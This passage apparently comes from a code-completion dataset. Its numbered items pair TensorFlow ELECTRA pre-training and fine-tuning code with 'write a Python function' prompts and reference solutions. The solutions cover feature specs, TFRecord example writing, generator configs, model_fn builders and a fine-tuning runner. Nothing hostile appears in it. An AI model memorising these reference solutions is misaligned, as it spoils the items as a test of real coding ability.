  with tf.io.gfile.GFile(input_file, "r") as f:
    reader = csv.reader(f, delimiter="\t", quotechar=quotechar)
    rows = []
    for row in reader:
      if max_lines and len(rows) >= max_lines:
        break
      rows.append(row)
    return rows
6,198 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import tensorflow.compat.v1 as tf
import configure_finetuning
class FeatureSpec(object):
  """Defines a feature passed as input to the model."""

  def __init__(self, name, shape, default_value_fn=None, is_int_feature=True):
    # name: feature key; shape: fixed-length feature shape;
    # default_value_fn: optional callable mapping shape -> default values;
    # is_int_feature: int64 feature when True, float32 otherwise.
    self.name = name
    self.shape = shape
    self.default_value_fn = default_value_fn
    self.is_int_feature = is_int_feature

  def get_parsing_spec(self):
    """tf.Example parsing spec matching this feature's shape and dtype."""
    dtype = tf.int64 if self.is_int_feature else tf.float32
    return tf.io.FixedLenFeature(self.shape, dtype)

  def get_default_values(self):
    """Default values: the custom fn's result or an all-zeros array."""
    if self.default_value_fn:
      return self.default_value_fn(self.shape)
    dtype = np.int64 if self.is_int_feature else np.float32
    return np.zeros(self.shape, dtype)
The provided code snippet includes necessary dependencies for implementing the `get_shared_feature_specs` function. Write a Python function `def get_shared_feature_specs(config: configure_finetuning.FinetuningConfig)` to solve the following problem:
Non-task-specific model inputs.
Here is the function:
def get_shared_feature_specs(config: configure_finetuning.FinetuningConfig):
  """Non-task-specific model inputs.

  Returns the feature specs shared by every fine-tuning task: token ids,
  attention mask, segment ids (all max_seq_length long) and a scalar
  task id.
  """
  max_len = config.max_seq_length
  return [
      FeatureSpec("input_ids", [max_len]),
      FeatureSpec("input_mask", [max_len]),
      FeatureSpec("segment_ids", [max_len]),
      FeatureSpec("task_id", []),
  ]
6,199 | import argparse
import multiprocessing
import os
import random
import time
import tensorflow.compat.v1 as tf
from model import tokenization
from util import utils
def create_int_feature(values):
  """Wrap an iterable of ints in a tf.train int64 Feature."""
  int64_list = tf.train.Int64List(value=list(values))
  return tf.train.Feature(int64_list=int64_list)
6,200 | import argparse
import multiprocessing
import os
import random
import time
import tensorflow.compat.v1 as tf
from model import tokenization
from util import utils
class ExampleWriter(object):
  """Writes pre-training examples to disk."""

  def __init__(self, job_id, vocab_file, output_dir, max_seq_length,
               num_jobs, blanks_separate_docs, do_lower_case,
               num_out_files=1000):
    # blanks_separate_docs: when True, blank input lines are still fed to
    # the builder, which lets them mark document boundaries.
    self._blanks_separate_docs = blanks_separate_docs
    tokenizer = tokenization.FullTokenizer(
        vocab_file=vocab_file,
        do_lower_case=do_lower_case)
    # NOTE(review): ExampleBuilder is defined elsewhere in this module;
    # presumably it buffers tokenized lines into fixed-length examples --
    # confirm against its definition.
    self._example_builder = ExampleBuilder(tokenizer, max_seq_length)
    # This job owns only the output shards whose index is congruent to
    # job_id modulo num_jobs, so parallel jobs never share a file.
    self._writers = []
    for i in range(num_out_files):
      if i % num_jobs == job_id:
        output_fname = os.path.join(
            output_dir, "pretrain_data.tfrecord-{:}-of-{:}".format(
                i, num_out_files))
        self._writers.append(tf.io.TFRecordWriter(output_fname))
    # Running count of examples written; also drives round-robin sharding.
    self.n_written = 0

  def write_examples(self, input_file):
    """Writes out examples from the provided input file."""
    with tf.io.gfile.GFile(input_file) as f:
      for line in f:
        line = line.strip()
        if line or self._blanks_separate_docs:
          example = self._example_builder.add_line(line)
          if example:
            # Distribute examples round-robin across this job's shards.
            self._writers[self.n_written % len(self._writers)].write(
                example.SerializeToString())
            self.n_written += 1
      # Feed a final blank line to flush whatever the builder still buffers.
      example = self._example_builder.add_line("")
      if example:
        self._writers[self.n_written % len(self._writers)].write(
            example.SerializeToString())
        self.n_written += 1

  def finish(self):
    """Close all output shard files."""
    for writer in self._writers:
      writer.close()
The provided code snippet includes necessary dependencies for implementing the `write_examples` function. Write a Python function `def write_examples(job_id, args)` to solve the following problem:
A single process creating and writing out pre-processed examples.
Here is the function:
def write_examples(job_id, args):
  """A single process creating and writing out pre-processed examples.

  Shards the corpus files across `args.num_processes` jobs by index,
  processes this job's share in random order, and logs progress with an
  ETA estimate after each file.
  """

  def log(*msg_parts):
    print("Job {}:".format(job_id), " ".join(map(str, msg_parts)))

  log("Creating example writer")
  example_writer = ExampleWriter(
      job_id=job_id,
      vocab_file=args.vocab_file,
      output_dir=args.output_dir,
      max_seq_length=args.max_seq_length,
      num_jobs=args.num_processes,
      blanks_separate_docs=args.blanks_separate_docs,
      do_lower_case=args.do_lower_case
  )
  log("Writing tf examples")
  # Keep only the corpus files assigned to this job, then shuffle them.
  all_fnames = sorted(tf.io.gfile.listdir(args.corpus_dir))
  fnames = [fname for i, fname in enumerate(all_fnames)
            if i % args.num_processes == job_id]
  random.shuffle(fnames)
  start_time = time.time()
  for file_no, fname in enumerate(fnames):
    if file_no > 0:
      elapsed = time.time() - start_time
      log("processed {:}/{:} files ({:.1f}%), ELAPSED: {:}s, ETA: {:}s, "
          "{:} examples written".format(
              file_no, len(fnames), 100.0 * file_no / len(fnames),
              int(elapsed),
              int((len(fnames) - file_no) / (file_no / elapsed)),
              example_writer.n_written))
    example_writer.write_examples(os.path.join(args.corpus_dir, fname))
  example_writer.finish()
  log("Done!")
6,201 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import modeling
from model import optimization
from pretrain import pretrain_data
from pretrain import pretrain_helpers
from util import training_utils
from util import utils
The provided code snippet includes necessary dependencies for implementing the `get_generator_config` function. Write a Python function `def get_generator_config(config: configure_pretraining.PretrainingConfig, bert_config: modeling.BertConfig)` to solve the following problem:
Get model config for the generator network.
Here is the function:
def get_generator_config(config: configure_pretraining.PretrainingConfig,
                         bert_config: modeling.BertConfig):
  """Get model config for the generator network.

  Derives the generator's config from the discriminator's by scaling its
  width and depth by the fractions in `config`, then re-deriving the
  dependent sizes.

  Args:
    config: pre-training configuration holding the scaling fractions
      (`generator_hidden_size`, `generator_layers`).
    bert_config: the discriminator's BertConfig to scale down.

  Returns:
    A new modeling.BertConfig for the generator.
  """
  gen_config = modeling.BertConfig.from_dict(bert_config.to_dict())
  # Scale hidden size and layer count by the configured fractions.
  gen_config.hidden_size = int(round(
      bert_config.hidden_size * config.generator_hidden_size))
  gen_config.num_hidden_layers = int(round(
      bert_config.num_hidden_layers * config.generator_layers))
  # Keep the conventional 4x feed-forward width and ~64-dim heads
  # (at least one head).
  gen_config.intermediate_size = 4 * gen_config.hidden_size
  gen_config.num_attention_heads = max(1, gen_config.hidden_size // 64)
  return gen_config
6,202 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import modeling
from model import optimization
from pretrain import pretrain_data
from pretrain import pretrain_helpers
from util import training_utils
from util import utils
def model_fn_builder(config: configure_pretraining.PretrainingConfig):
  """Build the model for training.

  Returns a `model_fn` closure suitable for a TPUEstimator: it constructs
  the pre-training model and wires up the optimizer (TRAIN mode) or the
  evaluation metrics (EVAL mode).
  """
  def model_fn(features, labels, mode, params):
    """Build the model for training."""
    # `labels` and `params` are unused here but required by the Estimator
    # model_fn signature.
    model = PretrainingModel(config, features,
                             mode == tf.estimator.ModeKeys.TRAIN)
    utils.log("Model is built!")
    if mode == tf.estimator.ModeKeys.TRAIN:
      train_op = optimization.create_optimizer(
          model.total_loss, config.learning_rate, config.num_train_steps,
          weight_decay_rate=config.weight_decay_rate,
          use_tpu=config.use_tpu,
          warmup_steps=config.num_warmup_steps,
          lr_decay_power=config.lr_decay_power
      )
      output_spec = tf.estimator.tpu.TPUEstimatorSpec(
          mode=mode,
          loss=model.total_loss,
          train_op=train_op,
          # ETAHook logs progress/ETA; on TPU it is given no tensors,
          # presumably because per-step tensor logging is unavailable
          # there -- confirm against training_utils.ETAHook.
          training_hooks=[training_utils.ETAHook(
              {} if config.use_tpu else dict(loss=model.total_loss),
              config.num_train_steps, config.iterations_per_loop,
              config.use_tpu)]
      )
    elif mode == tf.estimator.ModeKeys.EVAL:
      output_spec = tf.estimator.tpu.TPUEstimatorSpec(
          mode=mode,
          loss=model.total_loss,
          eval_metrics=model.eval_metrics,
          evaluation_hooks=[training_utils.ETAHook(
              {} if config.use_tpu else dict(loss=model.total_loss),
              config.num_eval_steps, config.iterations_per_loop,
              config.use_tpu, is_training=False)])
    else:
      # PREDICT mode is not implemented for pre-training.
      raise ValueError("Only TRAIN and EVAL modes are supported")
    return output_spec
  return model_fn
The provided code snippet includes necessary dependencies for implementing the `train_or_eval` function. Write a Python function `def train_or_eval(config: configure_pretraining.PretrainingConfig)` to solve the following problem:
Run pre-training or evaluate the pre-trained model.
Here is the function:
def train_or_eval(config: configure_pretraining.PretrainingConfig):
  """Run pre-training or evaluate the pre-trained model.

  Builds a TPUEstimator from the pre-training config and either trains for
  `config.num_train_steps` or evaluates for `config.num_eval_steps`.

  Args:
    config: the pre-training configuration.

  Returns:
    The estimator's evaluation metrics dict when evaluating, else None.

  Raises:
    ValueError: if `do_train` and `do_eval` are both set or both unset.
  """
  if config.do_train == config.do_eval:
    raise ValueError("Exactly one of `do_train` or `do_eval` must be True.")
  if config.debug:
    # Start from a clean model directory when debugging.
    utils.rmkdir(config.model_dir)
  utils.heading("Config:")
  utils.log_config(config)
  is_per_host = tf.estimator.tpu.InputPipelineConfig.PER_HOST_V2
  tpu_cluster_resolver = None
  if config.use_tpu and config.tpu_name:
    tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
        config.tpu_name, zone=config.tpu_zone, project=config.gcp_project)
  tpu_config = tf.estimator.tpu.TPUConfig(
      iterations_per_loop=config.iterations_per_loop,
      # Fix: this was a conditional with identical branches
      # (`num_tpu_cores if do_train else num_tpu_cores`); the shard count
      # does not depend on the train/eval mode.
      num_shards=config.num_tpu_cores,
      tpu_job_name=config.tpu_job_name,
      per_host_input_for_training=is_per_host)
  run_config = tf.estimator.tpu.RunConfig(
      cluster=tpu_cluster_resolver,
      model_dir=config.model_dir,
      save_checkpoints_steps=config.save_checkpoints_steps,
      tpu_config=tpu_config)
  model_fn = model_fn_builder(config=config)
  estimator = tf.estimator.tpu.TPUEstimator(
      use_tpu=config.use_tpu,
      model_fn=model_fn,
      config=run_config,
      train_batch_size=config.train_batch_size,
      eval_batch_size=config.eval_batch_size)
  if config.do_train:
    utils.heading("Running training")
    estimator.train(input_fn=pretrain_data.get_input_fn(config, True),
                    max_steps=config.num_train_steps)
  if config.do_eval:
    utils.heading("Running evaluation")
    result = estimator.evaluate(
        input_fn=pretrain_data.get_input_fn(config, False),
        steps=config.num_eval_steps)
    for key in sorted(result.keys()):
      utils.log(" {:} = {:}".format(key, str(result[key])))
    return result
6,203 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import tensorflow.compat.v1 as tf
import configure_pretraining
from model import modeling
from model import optimization
from pretrain import pretrain_data
from pretrain import pretrain_helpers
from util import training_utils
from util import utils
class PretrainingModel(object):
  """Transformer pre-training using the replaced-token-detection task."""
  # Builds a generator (masked-LM) and, when `electra_objective` is set, a
  # discriminator (replaced-token detection). `total_loss` is
  # gen_weight * MLM loss (+ disc_weight * discriminator loss).
  def __init__(self, config: configure_pretraining.PretrainingConfig,
               features, is_training):
    # Set up model config
    self._config = config
    self._bert_config = training_utils.get_bert_config(config)
    if config.debug:
      # Tiny model so debug runs build/train quickly.
      self._bert_config.num_hidden_layers = 3
      self._bert_config.hidden_size = 144
      self._bert_config.intermediate_size = 144 * 4
      self._bert_config.num_attention_heads = 4
    # Mask the input
    masked_inputs = pretrain_helpers.mask(
        config, pretrain_data.features_to_inputs(features), config.mask_prob)
    # Generator
    embedding_size = (
        self._bert_config.hidden_size if config.embedding_size is None else
        config.embedding_size)
    if config.uniform_generator:
      # No generator network: _get_masked_lm_output builds uniform logits.
      mlm_output = self._get_masked_lm_output(masked_inputs, None)
    elif config.electra_objective and config.untied_generator:
      generator = self._build_transformer(
          masked_inputs, is_training,
          bert_config=get_generator_config(config, self._bert_config),
          embedding_size=(None if config.untied_generator_embeddings
                          else embedding_size),
          untied_embeddings=config.untied_generator_embeddings,
          name="generator")
      mlm_output = self._get_masked_lm_output(masked_inputs, generator)
    else:
      generator = self._build_transformer(
          masked_inputs, is_training, embedding_size=embedding_size)
      mlm_output = self._get_masked_lm_output(masked_inputs, generator)
    fake_data = self._get_fake_data(masked_inputs, mlm_output.logits)
    self.mlm_output = mlm_output
    self.total_loss = config.gen_weight * mlm_output.loss
    # Discriminator
    disc_output = None
    if config.electra_objective:
      discriminator = self._build_transformer(
          fake_data.inputs, is_training, reuse=not config.untied_generator,
          embedding_size=embedding_size)
      disc_output = self._get_discriminator_output(
          fake_data.inputs, discriminator, fake_data.is_fake_tokens)
      self.total_loss += config.disc_weight * disc_output.loss
    # Evaluation
    eval_fn_inputs = {
        "input_ids": masked_inputs.input_ids,
        "masked_lm_preds": mlm_output.preds,
        "mlm_loss": mlm_output.per_example_loss,
        "masked_lm_ids": masked_inputs.masked_lm_ids,
        "masked_lm_weights": masked_inputs.masked_lm_weights,
        "input_mask": masked_inputs.input_mask
    }
    if config.electra_objective:
      eval_fn_inputs.update({
          "disc_loss": disc_output.per_example_loss,
          "disc_labels": disc_output.labels,
          "disc_probs": disc_output.probs,
          "disc_preds": disc_output.preds,
          "sampled_tokids": tf.argmax(fake_data.sampled_tokens, -1,
                                      output_type=tf.int32)
      })
    # Keys and values come from the same dict, so zip(eval_fn_keys, args)
    # inside metric_fn re-pairs them in a matching order.
    eval_fn_keys = eval_fn_inputs.keys()
    eval_fn_values = [eval_fn_inputs[k] for k in eval_fn_keys]
    def metric_fn(*args):
      """Computes the loss and accuracy of the model."""
      d = {k: arg for k, arg in zip(eval_fn_keys, args)}
      metrics = dict()
      metrics["masked_lm_accuracy"] = tf.metrics.accuracy(
          labels=tf.reshape(d["masked_lm_ids"], [-1]),
          predictions=tf.reshape(d["masked_lm_preds"], [-1]),
          weights=tf.reshape(d["masked_lm_weights"], [-1]))
      metrics["masked_lm_loss"] = tf.metrics.mean(
          values=tf.reshape(d["mlm_loss"], [-1]),
          weights=tf.reshape(d["masked_lm_weights"], [-1]))
      if config.electra_objective:
        metrics["sampled_masked_lm_accuracy"] = tf.metrics.accuracy(
            labels=tf.reshape(d["masked_lm_ids"], [-1]),
            predictions=tf.reshape(d["sampled_tokids"], [-1]),
            weights=tf.reshape(d["masked_lm_weights"], [-1]))
        if config.disc_weight > 0:
          metrics["disc_loss"] = tf.metrics.mean(d["disc_loss"])
          metrics["disc_auc"] = tf.metrics.auc(
              d["disc_labels"] * d["input_mask"],
              d["disc_probs"] * tf.cast(d["input_mask"], tf.float32))
          metrics["disc_accuracy"] = tf.metrics.accuracy(
              labels=d["disc_labels"], predictions=d["disc_preds"],
              weights=d["input_mask"])
          # Precision/recall via tf.metrics.accuracy with masked weights:
          # weights restrict the average to predicted-positive (precision)
          # or actually-positive (recall) positions.
          metrics["disc_precision"] = tf.metrics.accuracy(
              labels=d["disc_labels"], predictions=d["disc_preds"],
              weights=d["disc_preds"] * d["input_mask"])
          metrics["disc_recall"] = tf.metrics.accuracy(
              labels=d["disc_labels"], predictions=d["disc_preds"],
              weights=d["disc_labels"] * d["input_mask"])
      return metrics
    self.eval_metrics = (metric_fn, eval_fn_values)
  def _get_masked_lm_output(self, inputs: pretrain_data.Inputs, model):
    """Masked language modeling softmax layer."""
    masked_lm_weights = inputs.masked_lm_weights
    with tf.variable_scope("generator_predictions"):
      if self._config.uniform_generator:
        # All-zero logits == a uniform distribution over the vocabulary.
        logits = tf.zeros(self._bert_config.vocab_size)
        logits_tiled = tf.zeros(
            modeling.get_shape_list(inputs.masked_lm_ids) +
            [self._bert_config.vocab_size])
        logits_tiled += tf.reshape(logits, [1, 1, self._bert_config.vocab_size])
        logits = logits_tiled
      else:
        # Only masked positions are fed through the output layer.
        relevant_hidden = pretrain_helpers.gather_positions(
            model.get_sequence_output(), inputs.masked_lm_positions)
        hidden = tf.layers.dense(
            relevant_hidden,
            units=modeling.get_shape_list(model.get_embedding_table())[-1],
            activation=modeling.get_activation(self._bert_config.hidden_act),
            kernel_initializer=modeling.create_initializer(
                self._bert_config.initializer_range))
        hidden = modeling.layer_norm(hidden)
        output_bias = tf.get_variable(
            "output_bias",
            shape=[self._bert_config.vocab_size],
            initializer=tf.zeros_initializer())
        # Output projection is tied to the input embedding table.
        logits = tf.matmul(hidden, model.get_embedding_table(),
                           transpose_b=True)
        logits = tf.nn.bias_add(logits, output_bias)
      oh_labels = tf.one_hot(
          inputs.masked_lm_ids, depth=self._bert_config.vocab_size,
          dtype=tf.float32)
      probs = tf.nn.softmax(logits)
      log_probs = tf.nn.log_softmax(logits)
      label_log_probs = -tf.reduce_sum(log_probs * oh_labels, axis=-1)
      # Weighted-average negative log-likelihood over masked positions;
      # 1e-6 guards against an all-zero weight sum.
      numerator = tf.reduce_sum(inputs.masked_lm_weights * label_log_probs)
      denominator = tf.reduce_sum(masked_lm_weights) + 1e-6
      loss = numerator / denominator
      preds = tf.argmax(log_probs, axis=-1, output_type=tf.int32)
      MLMOutput = collections.namedtuple(
          "MLMOutput", ["logits", "probs", "loss", "per_example_loss", "preds"])
      return MLMOutput(
          logits=logits, probs=probs, per_example_loss=label_log_probs,
          loss=loss, preds=preds)
  def _get_discriminator_output(self, inputs, discriminator, labels):
    """Discriminator binary classifier."""
    with tf.variable_scope("discriminator_predictions"):
      hidden = tf.layers.dense(
          discriminator.get_sequence_output(),
          units=self._bert_config.hidden_size,
          activation=modeling.get_activation(self._bert_config.hidden_act),
          kernel_initializer=modeling.create_initializer(
              self._bert_config.initializer_range))
      logits = tf.squeeze(tf.layers.dense(hidden, units=1), -1)
      # Padding positions (input_mask == 0) are excluded from the loss.
      weights = tf.cast(inputs.input_mask, tf.float32)
      labelsf = tf.cast(labels, tf.float32)
      losses = tf.nn.sigmoid_cross_entropy_with_logits(
          logits=logits, labels=labelsf) * weights
      per_example_loss = (tf.reduce_sum(losses, axis=-1) /
                          (1e-6 + tf.reduce_sum(weights, axis=-1)))
      loss = tf.reduce_sum(losses) / (1e-6 + tf.reduce_sum(weights))
      probs = tf.nn.sigmoid(logits)
      # (sign(logits) + 1) / 2 maps positive logits -> 1, negative -> 0.
      preds = tf.cast(tf.round((tf.sign(logits) + 1) / 2), tf.int32)
      DiscOutput = collections.namedtuple(
          "DiscOutput", ["loss", "per_example_loss", "probs", "preds",
                         "labels"])
      return DiscOutput(
          loss=loss, per_example_loss=per_example_loss, probs=probs,
          preds=preds, labels=labels,
      )
  def _get_fake_data(self, inputs, mlm_logits):
    """Sample from the generator to create corrupted input."""
    inputs = pretrain_helpers.unmask(inputs)
    disallow = tf.one_hot(
        inputs.masked_lm_ids, depth=self._bert_config.vocab_size,
        dtype=tf.float32) if self._config.disallow_correct else None
    # stop_gradient: the discriminator loss does not backprop into the
    # generator through the sampled tokens.
    sampled_tokens = tf.stop_gradient(pretrain_helpers.sample_from_softmax(
        mlm_logits / self._config.temperature, disallow=disallow))
    sampled_tokids = tf.argmax(sampled_tokens, -1, output_type=tf.int32)
    updated_input_ids, masked = pretrain_helpers.scatter_update(
        inputs.input_ids, sampled_tokids, inputs.masked_lm_positions)
    # A position is "fake" only if it was masked AND the sampled token
    # differs from the original token.
    labels = masked * (1 - tf.cast(
        tf.equal(updated_input_ids, inputs.input_ids), tf.int32))
    updated_inputs = pretrain_data.get_updated_inputs(
        inputs, input_ids=updated_input_ids)
    FakedData = collections.namedtuple("FakedData", [
        "inputs", "is_fake_tokens", "sampled_tokens"])
    return FakedData(inputs=updated_inputs, is_fake_tokens=labels,
                     sampled_tokens=sampled_tokens)
  def _build_transformer(self, inputs: pretrain_data.Inputs, is_training,
                         bert_config=None, name="electra", reuse=False, **kwargs):
    """Build a transformer encoder network."""
    if bert_config is None:
      bert_config = self._bert_config
    # reuse=True shares variables with a previously built encoder (used for
    # the tied generator/discriminator configuration).
    with tf.variable_scope(tf.get_variable_scope(), reuse=reuse):
      return modeling.BertModel(
          bert_config=bert_config,
          is_training=is_training,
          input_ids=inputs.input_ids,
          input_mask=inputs.input_mask,
          token_type_ids=inputs.segment_ids,
          use_one_hot_embeddings=self._config.use_tpu,
          scope=name,
          **kwargs)
The provided code snippet includes necessary dependencies for implementing the `train_one_step` function. Write a Python function `def train_one_step(config: configure_pretraining.PretrainingConfig)` to solve the following problem:
Builds an ELECTRA model and trains it for one step; useful for debugging.
Here is the function:
def train_one_step(config: configure_pretraining.PretrainingConfig):
  """Builds an ELECTRA model and trains it for one step; useful for debugging."""
  train_input_fn = pretrain_data.get_input_fn(config, True)
  features = tf.data.make_one_shot_iterator(train_input_fn(dict(
      batch_size=config.train_batch_size))).get_next()
  model = PretrainingModel(config, features, True)
  with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    # Log the combined generator + discriminator loss for one batch.
    utils.log(sess.run(model.total_loss))
6,204 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import preprocessing
from finetune import task_builder
from model import modeling
from model import optimization
from util import training_utils
from util import utils
import numpy as np
class FinetuningModel(object):
  """Finetuning model with support for multi-task training."""
  def __init__(self, config: configure_finetuning.FinetuningConfig, tasks,
               is_training, features, num_train_steps):
    # Create a shared transformer encoder
    bert_config = training_utils.get_bert_config(config)
    self.bert_config = bert_config
    if config.debug:
      # Tiny model for fast debug runs.
      bert_config.num_hidden_layers = 3
      bert_config.hidden_size = 144
      bert_config.intermediate_size = 144 * 4
      bert_config.num_attention_heads = 4
    assert config.max_seq_length <= bert_config.max_position_embeddings
    bert_model = modeling.BertModel(
        bert_config=bert_config,
        is_training=is_training,
        input_ids=features["input_ids"],
        input_mask=features["input_mask"],
        token_type_ids=features["segment_ids"],
        use_one_hot_embeddings=config.use_tpu,
        embedding_size=config.embedding_size)
    # Fraction of training completed; passed to each task's prediction
    # module (e.g. for schedules that depend on training progress).
    percent_done = (tf.cast(tf.train.get_or_create_global_step(), tf.float32) /
                    tf.cast(num_train_steps, tf.float32))
    # Add specific tasks
    self.outputs = {"task_id": features["task_id"]}
    losses = []
    for task in tasks:
      with tf.variable_scope("task_specific/" + task.name):
        task_losses, task_outputs = task.get_prediction_module(
            bert_model, features, is_training, percent_done)
        losses.append(task_losses)
        self.outputs[task.name] = task_outputs
    # one_hot on task_id selects, for each example, only the loss of the
    # task that example belongs to.
    self.loss = tf.reduce_sum(
        tf.stack(losses, -1) *
        tf.one_hot(features["task_id"], len(config.task_names)))
The provided code snippet includes necessary dependencies for implementing the `model_fn_builder` function. Write a Python function `def model_fn_builder(config: configure_finetuning.FinetuningConfig, tasks, num_train_steps, pretraining_config=None)` to solve the following problem:
Returns `model_fn` closure for TPUEstimator.
Here is the function:
def model_fn_builder(config: configure_finetuning.FinetuningConfig, tasks,
                     num_train_steps, pretraining_config=None):
  """Returns `model_fn` closure for TPUEstimator.

  Args:
    config: fine-tuning run configuration.
    tasks: the task objects being fine-tuned on.
    num_train_steps: total number of optimizer steps.
    pretraining_config: if given, the latest checkpoint from its model_dir
      is used instead of `config.init_checkpoint`.
  """
  def model_fn(features, labels, mode, params):
    """The `model_fn` for TPUEstimator."""
    utils.log("Building model...")
    is_training = (mode == tf.estimator.ModeKeys.TRAIN)
    model = FinetuningModel(
        config, tasks, is_training, features, num_train_steps)
    # Load pre-trained weights from checkpoint
    init_checkpoint = config.init_checkpoint
    if pretraining_config is not None:
      init_checkpoint = tf.train.latest_checkpoint(pretraining_config.model_dir)
      utils.log("Using checkpoint", init_checkpoint)
    tvars = tf.trainable_variables()
    # calculate total number of params
    num_params = sum([np.prod(v.shape) for v in tvars])
    utils.log('##### params: {} #####'.format(num_params))
    scaffold_fn = None
    if init_checkpoint:
      assignment_map, _ = modeling.get_assignment_map_from_checkpoint(
          tvars, init_checkpoint)
      if config.use_tpu:
        # On TPU, checkpoint initialization must happen inside the scaffold.
        def tpu_scaffold():
          tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
          return tf.train.Scaffold()
        scaffold_fn = tpu_scaffold
      else:
        tf.train.init_from_checkpoint(init_checkpoint, assignment_map)
    # Build model for training or prediction
    if mode == tf.estimator.ModeKeys.TRAIN:
      train_op = optimization.create_optimizer(
          model.loss, config.learning_rate, num_train_steps,
          weight_decay_rate=config.weight_decay_rate,
          use_tpu=config.use_tpu,
          warmup_proportion=config.warmup_proportion,
          layerwise_lr_decay_power=config.layerwise_lr_decay,
          n_transformer_layers=model.bert_config.num_hidden_layers
      )
      output_spec = tf.estimator.tpu.TPUEstimatorSpec(
          mode=mode,
          loss=model.loss,
          train_op=train_op,
          scaffold_fn=scaffold_fn,
          training_hooks=[training_utils.ETAHook(
              {} if config.use_tpu else dict(loss=model.loss),
              num_train_steps, config.iterations_per_loop, config.use_tpu, 10)])
    else:
      # Evaluation is driven through predict() + task scorers, so only
      # TRAIN and PREDICT modes are supported here.
      assert mode == tf.estimator.ModeKeys.PREDICT
      output_spec = tf.estimator.tpu.TPUEstimatorSpec(
          mode=mode,
          predictions=utils.flatten_dict(model.outputs),
          scaffold_fn=scaffold_fn)
    utils.log("Building complete")
    return output_spec
  return model_fn
6,205 | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import json
import tensorflow.compat.v1 as tf
import configure_finetuning
from finetune import preprocessing
from finetune import task_builder
from model import modeling
from model import optimization
from util import training_utils
from util import utils
import numpy as np
class ModelRunner(object):
  """Fine-tunes a model on a supervised task."""
  def __init__(self, config: configure_finetuning.FinetuningConfig, tasks,
               pretraining_config=None):
    self._config = config
    self._tasks = tasks
    self._preprocessor = preprocessing.Preprocessor(config, self._tasks)
    is_per_host = tf.estimator.tpu.InputPipelineConfig.PER_HOST_V2
    tpu_cluster_resolver = None
    if config.use_tpu and config.tpu_name:
      tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
          config.tpu_name, zone=config.tpu_zone, project=config.gcp_project)
    tpu_config = tf.estimator.tpu.TPUConfig(
        iterations_per_loop=config.iterations_per_loop,
        num_shards=config.num_tpu_cores,
        per_host_input_for_training=is_per_host,
        tpu_job_name=config.tpu_job_name)
    run_config = tf.estimator.tpu.RunConfig(
        cluster=tpu_cluster_resolver,
        model_dir=config.model_dir,
        save_checkpoints_steps=config.save_checkpoints_steps,
        save_checkpoints_secs=None,
        tpu_config=tpu_config)
    if self._config.do_train:
      (self._train_input_fn,
       self.train_steps) = self._preprocessor.prepare_train()
    else:
      self._train_input_fn, self.train_steps = None, 0
    model_fn = model_fn_builder(
        config=config,
        tasks=self._tasks,
        num_train_steps=self.train_steps,
        pretraining_config=pretraining_config)
    self._estimator = tf.estimator.tpu.TPUEstimator(
        use_tpu=config.use_tpu,
        model_fn=model_fn,
        config=run_config,
        train_batch_size=config.train_batch_size,
        eval_batch_size=config.eval_batch_size,
        predict_batch_size=config.predict_batch_size)
  def train(self):
    # Train until max_steps; resumes from model_dir checkpoints if present.
    utils.log("Training for {:} steps".format(self.train_steps))
    self._estimator.train(
        input_fn=self._train_input_fn, max_steps=self.train_steps)
  def evaluate(self, split="dev"):
    # Returns {task name: metrics dict} for every configured task.
    return {task.name: self.evaluate_task(task, split=split) for task in self._tasks}
  def evaluate_task(self, task, split="dev", return_results=True):
    """Evaluate the current model."""
    utils.log("Evaluating", task.name, split)
    eval_input_fn, _ = self._preprocessor.prepare_predict([task], split)
    results = self._estimator.predict(input_fn=eval_input_fn,
                                      yield_single_examples=True)
    # The Chinese MRC tasks need the split to locate their eval files.
    if task.name == "cmrc2018" or task.name == "drcd":
      scorer = task.get_scorer(split)
    else:
      scorer = task.get_scorer()
    for r in results:
      # task_id == len(tasks) marks batch-padding examples; skip them.
      if r["task_id"] != len(self._tasks):  # ignore padding examples
        r = utils.nest_dict(r, self._config.task_names)
        scorer.update(r[task.name])
    if return_results:
      utils.log(task.name + ": " + scorer.results_str())
      utils.log()
      return dict(scorer.get_results())
    else:
      # Caller gets the scorer itself, e.g. to write predictions.
      return scorer
  def write_classification_outputs(self, tasks, trial, split):
    """Write classification predictions to disk."""
    utils.log("Writing out predictions for", tasks, split)
    predict_input_fn, _ = self._preprocessor.prepare_predict(tasks, split)
    results = self._estimator.predict(input_fn=predict_input_fn,
                                      yield_single_examples=True)
    # task name -> eid -> model-logits
    logits = collections.defaultdict(dict)
    for r in results:
      if r["task_id"] != len(self._tasks):
        r = utils.nest_dict(r, self._config.task_names)
        task_name = self._config.task_names[r["task_id"]]
        # Regression-style tasks expose "predictions" instead of "logits".
        logits[task_name][r[task_name]["eid"]] = (
            r[task_name]["logits"] if "logits" in r[task_name]
            else r[task_name]["predictions"])
    for task_name in logits:
      utils.log("Pickling predictions for {:} {:} examples ({:})".format(
          len(logits[task_name]), task_name, split))
      if trial <= self._config.n_writes_test:
        utils.write_pickle(logits[task_name], self._config.test_predictions(
            task_name, split, trial))
def write_results(config: configure_finetuning.FinetuningConfig, results):
  """Write evaluation metrics to disk (pickle plus human-readable txt).

  Args:
    config: run configuration providing `results_txt` / `results_pkl` paths.
    results: list of per-trial {task_name: {metric: value}} dicts.
  """
  utils.log("Writing results to", config.results_txt)
  utils.mkdir(config.results_txt.rsplit("/", 1)[0])
  with tf.io.gfile.GFile(config.results_txt, "w") as f:
    results_str = ""
    for trial_results in results:
      for task_name, task_results in trial_results.items():
        # "time" and "global_step" are bookkeeping entries, not task metrics.
        if task_name == "time" or task_name == "global_step":
          continue
        results_str += task_name + ": " + " - ".join(
            ["{:}: {:.2f}".format(k, v)
             for k, v in task_results.items()]) + "\n"
    f.write(results_str)
  # The original wrote the identical pickle twice (before and after the txt
